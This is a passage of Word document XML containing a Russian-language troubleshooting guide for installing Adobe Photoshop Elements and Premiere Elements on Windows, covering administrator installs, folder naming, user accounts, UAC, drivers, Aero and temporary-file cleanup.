          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="main-pars_header_10"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Выполните установки от имени администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="main-pars_text_8"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройки безопасности в Windows 7, 8, 10 и Vista иногда могут не разрешать приложениям выполнять запись в места защищенных файлов или в ключи реестра. Запуск программы установки от имени администратора позволяет обойти настройки безопасности и выполнить запись в защищенные области.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для установки Photoshop Elements или Adobe Premiere Elements в качестве администратора выполните следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Скопируйте папку Adobe Photoshop Elements или Premiere Elements с диска на рабочий стол.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откройте папку Photoshop Elements или Adobe Premiere Elements на рабочем столе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Правой кнопкой мыши нажмите файл Setup (или Setup.exe) и выберите пункт </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2284950" cy="1080521"/>
            <wp:effectExtent l="19050" t="0" r="1050" b="0"/>
            <wp:docPr id="156" name="Рисунок 178" descr="Свойства файла Setup.e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Свойства файла Setup.exe"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2286350" cy="1081183"/>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 xml:space="preserve">На вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совместимость</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустить эту программу от имени администратора</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1550550" cy="1910809"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="157" name="Рисунок 179" descr="Запустите программу от имени администр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Запустите программу от имени администратора"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1555481" cy="1916886"/>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 xml:space="preserve">Нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОК</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Двойным нажатием запустите файл Setup (или Setup.exe) и следуйте инструкциям на экране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="main-pars_header_11"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Установите в папку на корневом уровне жесткого диска.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="main-pars_text_9"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Создайте папку в корневом уровне жесткого диска. Убедитесь, что имя папки содержит 8 или менее символов (например, C:\PSE или C:\PRE) и не содержит специальных символов, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">например </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Кроме того, убедитесь, что путь к месту, куда установлена ОС Windows, не содержит специальных символов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="main-pars_text_10"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Создайте папку в корневом уровне жесткого диска. Убедитесь, что имя папки содержит 8 или менее символов (например, C:\PSE или C:\PRE) и не содержит специальных символов, например </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Кроме того, убедитесь, что путь к месту, куда установлена ОС Windows, не содержит специальных символов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="main-pars_header_12"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Установите под новой учетной записью.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="main-pars_text_11"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Создайте учетную запись пользователя с такими же правами, как у учетной записи, которой вы пользовались в момент возникновения проблемы. Если проблема не повторилась, возможно, исходная учетная запись пользователя повреждена. Подробнее о создании учетной записи см. в разделе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Создание нового пользователя</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, либо обратитесь к системному администратору.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="main-pars_header_13"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Отключите контроль учетных записей (UAC).</w:t>
      </w:r>
      <w:bookmarkStart w:id="64" w:name="main-pars_text_12"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">См. подробную информацию в разделе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Включение и отключение контроля учетных записей</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="main-pars_header_14"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Обновление драйвера видеокарты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="main-pars_text_13"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Многие производители видеокарт часто обновляют свои программные драйверы. Если Вы давно не обновляли драйвер видеокарты, обратитесь к производителю видеокарты за обновленным драйвером или загрузите его с веб-сайта производителя. (Для того, чтобы определить производителя видеокарты, просмотрите свойства карты в Диспетчере устройств). Во многих случаях можно определить неактуальность драйвера видеокарты, изменив глубину цвета и разрешение видеокарты. Также это можно определить, отключив аппаратное ускорение графики.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы изменить глубину цвета и разрешение, используемые для Photoshop Elements и Adobe Premiere Elements, см. раздел </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Изменение глубины цвета и разрешения для </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 7 и Vista</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.Для Photoshop Elements и Premiere Elements требуется разрешение экрана по меньшей мере 1024 × 768.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы отключить ускорение графических аппаратных средств, см. раздел </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отключить ускорение графических аппаратных средств</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в поддержке Microsoft Windows. В зависимости от используемой видеокарты, эта функция может быть недоступна в Windows 7,8 и 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="main-pars_header_15"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7. Убедитесь, что драйверы устройств совместимы с Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="main-pars_text_14"/>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если обновление драйвера видеокарты не устранило проблему, то убедитесь, что все другие драйверы устройства совместимы с данной версией Windows (</w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или</w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 7 и Vista</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>). Драйверы устройств – это файлы программного обеспечения, которые позволяют Windows взаимодействовать с устройствами, такими как сканеры, мыши и клавиатуры. Свяжитесь с производителем устройства, чтобы убедиться в том, что используется последняя версия драйвера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="main-pars_header_16"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Отключите Windows Aero. </w:t>
      </w:r>
      <w:bookmarkStart w:id="70" w:name="main-pars_text_15"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">См. подробную информацию в разделе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Отключение Windows Aero</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows 7 и Vista).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="main-pars_header_17"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9. Оптимизируйте работу с временными файлами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="main-pars_text_16"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows и различные приложения хранят рабочие данные во временных файлах (.tmp), которые создаются на жестком диске. Избыточные и устаревшие временные файлы могут негативно повлиять на производительность. Дополнительные сведения об удалении временных файлов при помощи инструмента Disk Cleanup, см. в разделах </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>«</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 10</w:t>
        </w:r>
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>»</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>,</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:anchor="delete-files-using-disk-cleanup=windows-8" w:history="1">
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>«</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 8</w:t>
        </w:r>
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>»</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>,</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>«</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Windows 7</w:t>
        </w:r>
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>»</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> и </w:t>
